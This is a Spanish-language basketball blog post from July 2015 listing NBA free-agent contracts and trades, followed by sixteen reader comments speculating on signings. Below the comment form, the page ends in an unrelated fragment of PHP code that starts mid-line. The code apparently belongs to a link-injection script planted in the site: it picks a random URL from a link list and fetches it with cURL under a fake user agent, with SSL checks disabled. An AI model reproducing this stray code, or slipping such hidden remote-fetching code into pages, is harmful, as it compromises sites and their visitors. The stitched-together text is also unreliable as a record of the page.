Mercado NBA: Morteradas para todos

02 de July de 2015 por txusma

La vorágine del mercado nos obliga a inaugurar un nuevo artículo. El otro corría el riesgo de derrumbarse bajo el peso de la avalancha de renovaciones, acuerdos, contratos y fichajes que se cerraron el primer día de agencia libre. Vamos a intentar recopilar todos los nuevos contratos (con * los jugadores que han cambiado de equipos, que no son tantos):

Kawhi Leonard: 90×5, Spurs
Danny Green: 45×4, Spurs
Kevin Love: 110×5, Cavs
Tristan Thompson: 80×5, Cavs
Iman Shumpert: 40×4, Cavs
Jimmy Butler: 90×5, Bulls (la famosa Maximum Qualifying Offer)
Mike Dunleavy: 15×3, Bulls
Brook Lopez: 60×3, Nets
Thaddeus Young: 50×4, Nets
Brandon Knight: 70×5, Suns
Tyson Chander: 52×4, Suns*
Jae Crowder: 35×5, Celtics
Amir Johnson: 24×2, Celtics*
Jonas Jebreko: 10×2, Celtics
Omer Asik: 60×5, Pelicans
Alexis Ajinca: 20×4, Pelicans
Kyle Singler: 25×5, Thunder
Paul Pierce: 10.5×3, Clippers*
Brandan Wright: 18×3, Grizzlies*
Al-Farouq Aminu: 30×4, Blazers*
Goran Dragic: 90×5, Heat
Paul Millsap: 58×3, Hawks (durante buena parte del día parecía que acabaría en los Magic)
Khris Middleton: 70×5, Bucks
DeMarre Carroll: 60×4, Raptors*
Draymond Green: 85×5, Warriors (y eso que por un momento pareció que partía peras con los Warriors)

 Además los Sacramento Kings traspasaron a Nik Stauskas, Carl Landry, Jason Thompson, una 1ª ronda protegida TOP-10 y el derecho a intercambiar primeras rondas en un par de temporada a los Sixers a cambio de los derechos de un par de jugadores de 2ª ronda como Arturas Gudaitis y Luka Mitrovic. Resumiendo, los Kings les dan a los Sixers una 1ª ronda a cambio de que ellos asuman unos 25 millones de salario. Y recordemos que los San Antonio Spurs enviaron a Tiago Splitter con un lacito.

¿Recuperados de la impresión? Lo primero que salta a la vista son los enormes contratos que se están firmando. No hay que olvidar que gracias al nuevo contrato de televisión que ha firmado la NBA el límite salarial de la próximo temporada puede pasar de los 90 millones de dólares por lo que los nuevos contratos se están cerrando en consecuencia. Dejad de lamentaros y acostumbraos a los nuevos números. Kyle Singler puede cobrar 5 kilos por temporada, Iman Shumpert 10, Amir Johnson 12, DeMarre Carroll 15 y Draymond Green 17 así, sin despeinarse.  A partir de ahora será raro que un titular baje de los 10 millones al año.

¿Y con semejante lista aún queda agentes libres por firmar? Pues claro, de hecho el más codiciado, Lamarcus Aldridge, sigue deshojando la margarita aunque todo apunta que firmará por los Spurs, que tras el traspaso de Splitter han hecho hueco. Duro golpe para los Lakers que poco a poco van viendo como se reduce el número de agentes libres. Greg Monroe parece ser su hombre, ahora mismo.

Pero hay otros muchos nombres en liza:

– El traspaso de los Kings parece haberse producido con el objetivo de incorporar a Rajon Rondo y Wesley Matheews. No hay muchos equipos que se interesen por el ex de los Mavs pero tendrán que pelear bastante para hacerse con los servicios de Matheews. Por si acaso parece que también han puesto el ojo sobre Monta Ellis, que hasta ayer mismo parecía tenerlo hecho con los Pacers. Rondo, Ellis, Gay, Cousins… Este equipo sería entretenidísimo!
– Otro nombre importante es el de DeAndre Jordan. Los Mavs parecen llevar ventaja pero Lakers, Blazers y los mismos Clippers también le siguen los pasos.
– El nombre de David West ha estado ligado con el de los Knicks desde hace días pero hoy también surgen los Warriors como pretendientes.
Marc Gasol renovará por los Grizzlies pero estamos a la espera de conocer el montante global del contrato. Visto lo visto, no esperamos menos de 20 kilos por temporada.
– Se rumorea que la renovación de Brandon Knight puede acarrear el traspaso de Eric Bledsoe algo que desde la franquicia niegan continuamente. Los Knicks y los Rockets aparecen como posibles destino del base de los Suns.
Sergi Llull había rechazado la oferta de los Rockets y de momento se queda en el Real Madrid.

Comenta

16 comentarios a esta entrada

  1. Jose Luis dice:
    #1

    20 x 4 Ajinca… mi madre xdd

      Citar

  2. Triceratops dice:
    #2

    Millsap se queda en Atlanta (58×3), me parece bien, prefiero a Harris, eso si, Orlando debe poner toda la carne en el asador e igualar cualquier oferta por él, aunque sea para traspsarlo posteriormente y pillar cacho.
    Si no lo hacen, se van a quedar con una mano delante y otra detrás.

      Citar

  3. Blade Petrovic dice:
    #3

    Ajinca, un jugador que llego a tener 43 de valoración en el 2k

      Citar

  4. Vader dice:
    #4

    Afflalo 8+8 (player option) para los Knicks. Bien hecho tito Phil… Bien hecho…

      Citar

  5. Triceratops dice:
    #5

    Tengo una duda.., si el limite salarial no se amplia este año (15-16) sino el próximo verano. Todos estos equipos que estan firmando contratazos..¿pagaran multazo este año, no?

      Citar

  6. Ruxixón dice:
    #6

    Hostia,pues a mí Ajinca me parece un tío en condiciones,de esos que de tapadillo son capaces de hacerse hueco bajo la tutela adecuada.No creo que Asik,el de este año al menos,le de mucha envidia (comentario automático para contradecir a Jose Luis,jaja)

    Buen fichaje de tito Phil,Vader,no cabe duda,os llegará con ganas de hacerlo bien para salirse del contrato y ganarse unos millones de más,y conociendo a Melo de su etapa en Denver,Bajo mi humilde opinión uno de los mejores movimientos hasta ahora.Me da garantías un Grant (si,de titular)-Afflalo-Melo.A ver ahora porque necesitan un 4 y un 5 que se complementen.

    Y comentando en general,siempre fui un poco escéptico respecto a la influencia de Kobe a la hora de fichar otros FA,y lo cierto es que con lo que ha salido del affaire Aldridge casi que vayan cerrando etapa por su bien.A ver qué equipo logra juntar el inepto de Buss hijo,que igual sólo ha tirado por los grandes nombres y se ha olvidado de hacer un equipo serio en el que crezcan Randle y Russell.Más de lo mismo me pasa con Ainge en los Celtics,aunque en su caso no sé que hace firmando escoltas y alapívots sin cesar.Algo tendrá que mover para darle algo de sentido al proyecto.Y sinsentido es lo de Sacramento,vaya regalito más bueno el de Stauskas 1 año después de la elección.Phila lo quiso el año pasado y este año lo consigue de oferta con un par de rondas que nunca se sabe,tragando salarios que no estorban para nada.Todo para reunir nombres en el quinteto,con un entrenador cuestionadísimo…habrán salvado a la franquicia pero el indio va fino en lo suyo.

    Entrañable documento: https://www.youtube.com/watch?v=rEN6ad_Aw-M

      Citar

  7. Vader dice:
    #7

    Ahora si cayera Monroe seria la ostia y Robin Lopez tambien seria una gran incorporación.

    A ver que pasa pero ya me parece bien que se fiche sólo lo que interese y se pueda a precio correcto. Ya hemos estado muchos años con contratos toxicos en el roster. Esa estapa se ha cerrado.

    Saludos

      Citar

  8. dunc dice:
    #8

    Uffff, Monroe parece que se va a los Bucks.

    Ya molaba ese equipo antes pero como Monroe se parezca al Monroe de hace un par de años lo van a petar bastante.

    Lo siento por los Knicks y sus aficionados.

      Citar

  9. Vader dice:
    #9

    Pues si una pena que Monroe se escape, hubiera molado… Esta claro que Bucks tiene mejor equipo pero la verdad no me lo esperaba. New York es New York… y con nosotros hubiera sido la segunda espada del equipo, tendria galones.

    Jordan y Aldridge por supuesto no tienen pinta de acabar en NY. A ver si viene R.Lopez. Sea como sea no era la AL que esperabamos y deseabamos.

    Visto lo visto y que ahora el contrato de Melo es hasta golosa ¿veis traspaso a la vista durante la próxima temporada?

    Saludos

      Citar

  10. Triceratops dice:
    #10

    Parece que este año no hay ningún equipo tankeando a muerte como en los últimos, ¿quien os parece a dia de hoy el peor equipo de la liga?

    Yo diría, los Blazers. El traspaso de Batum, las probables bajas de Aldridge, Matthews y Lopez, y el salvaje Oeste hace que el equipo tenga ahora mismo todas las papeletas para apuntar alto en el próximo Draft.

      Citar

  11. Ruxixón dice:
    #11

    Triceratops:
    Parece que este año no hay ningún equipo tankeando a muerte como en los últimos, ¿quien os parece a dia de hoy el peor equipo de la liga?
    Yo diría, los Blazers. El traspaso de Batum, las probables bajas de Aldridge, Matthews y Lopez, y el salvaje Oeste hace que el equipo tenga ahora mismo todas las papeletas para apuntar alto en el próximo Draft.

    Denver tampoco se sabe hacia donde va con todos sus jugadores transferibles.O porque no,los mismos Lakers a falta de saber que firmas tendrán en la FA,no hay que pasar por alto que su ronda del año que viene es protegida TOP 3 y viendo lo caro que es el oeste…igual hay que tanquear.

      Citar

  12. Rompe dice:
    #12

    Una duda: en caso de que LaMarcus acabe fichando por San Antonio, sería el primer gran fichaje del equipo en mucho tiempo, ¿cierto? Ya que prácticamente todo el equipo que han tenido en los últimos años se ha conseguido vía draft o vía jugadores en claro declive en otros equipos…

      Citar

  13. Jose Luis dice:
    #13

    Se escucha ahora LaMarcus a Suns… lo dudo, la verdad, pero han liberado mucho hueco

      Citar

  14. Vader dice:
    #14

    @Rompe

    Yo no recuerdo en la vida un fichaje de AL como el de LaMarcus por Sant Antonio…

    – Leo que R.Lopez y Knicks estan muy cerca. Seguramente se confirmará en cuanto sea oficial que A.Jordan descarta a los Knicks, algo que ahora mismo aún no ha sucedido. Los Knicks tienen pocas esperanzas en Jordan, parece ser que esta entre Clippers y Mavs, pero hasta que no sea “oficial” siguen en la carrera. Otra opción para R.Lopez son los Lakers, entre Lakers y Knicks parece que caera…

    – West esta esperando ver que pasa con LaMarcus y con Jordan para decidir futuro. Como dijo él mismo quiere luchar por el anillo (Y bien merecido que se lo tiene).

    – Varios equipos podrán intentar el trade por Hibbert si no consiguen a Jordan o R.Lopez, entre ellos los Knicks.

    – Wade un año más en Miami, 20 Kilos.

    Saludos!!

      Citar

  15. Vader dice:
    #15

    Ahh y se me olvidaba. A falta de pan buenas son tortas, tanto Knicks como Lakers estarían considerando el PF David Lee para el año que viene. A Warriors le conviene quitarselo de encima y es un jugador que siempre aporta y cuyo contrato es goloso pues es expiring.

      Citar

  16. Vader dice:
    #16

    – Ya se ha confirmado, Jordan a los Mavs y los Clippers que se quedan con un buen problema. Nowitzki interrumpio sus vacaciones familiares para la entrevista con el pivot, en la reunión que tuvo con los Clippers no estaba ningún jugador…

    – Efecto domino, R.Lopez nuevo Knick. Ahora estan negociando con Brewer y D.Williams.

    – Belinelli a los Kings 3 años x 19 Kilos.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>